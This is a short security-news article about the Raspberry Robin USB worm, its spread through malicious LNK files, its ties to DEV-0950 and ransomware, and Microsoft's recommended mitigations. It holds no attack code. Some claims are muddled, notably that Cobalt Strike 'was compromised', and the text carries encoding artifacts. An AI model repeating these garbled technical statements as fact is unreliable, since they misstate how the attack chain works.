Human-operated ransomware activity:Â It occurs when cybercriminals are involved in an active attack on a victim. Using this approach, an organizationâs on-premises infrastructure is penetrated, privileges are elevated, and ransomware is deployed by the threat actors.
Compromised 1,000 Organizations
In the past 30 days, on more than 1000 organizationsâ 3000 devices, the Raspberry Robin worm has initiated payload alerts. There have been instances where the Raspberry Robin worm has been installed on the victimsâ systems with malware called FakeUpdates.
Raspberry Worm is also known as QNAP Worm, as for command-and-control, it uses the compromised QNAP storage servers. Through infected USB drives containing malicious. LNK files, Raspberry Robin spreads to other devices.
The worm will spawn a msiexec process using cmd[.]exe as soon as a USB device is attached.
In order to communicate with its C2 servers, the malware communicates with compromised Windows devices.
Raspberry Robinâs Connection
Microsoft Security Threat Intelligence Center (MSTIC) observed Raspberry Robin in October 2022, and itâs being used by DEV-0950, which is another actor who was also involved in the post-compromise activity.
As a result of the DEV-0950 activity, the Cobalt Strike was compromised through hands-on keyboard activity. The majority of the victims of DEV-0950 are traditionally acquired via phishing scams.
However, the operators of DEV-0950 have moved to use Raspberry Robin instead of the traditional method. The advantage of this approach is that the payloads can be delivered to existing infections and the campaigns can move to the stage of ransomware more quickly.
Mitigations
To mitigate the impact of this threat, it is also possible for defenders to apply the following mitigation measures:-
When mounting the drive, prevent autorun from being used and code from being executed.
Make sure the tamper protection setting is enabled in order to protect Microsoft Defender Antivirus from being interrupted by attacks.
It is very important to turn on cloud-delivered protection for Microsoft Defender Antivirus or your antivirus software counterpart if it supports the feature.
The USB port should be blocked from running untrusted or unsigned processes.
Scripts that may be obfuscated should be blocked from being executed.
It is imperative to block executable files from running unless they fulfill all the trusted criteria.
The local security authority subsystem of Windows should be protected against credential theft.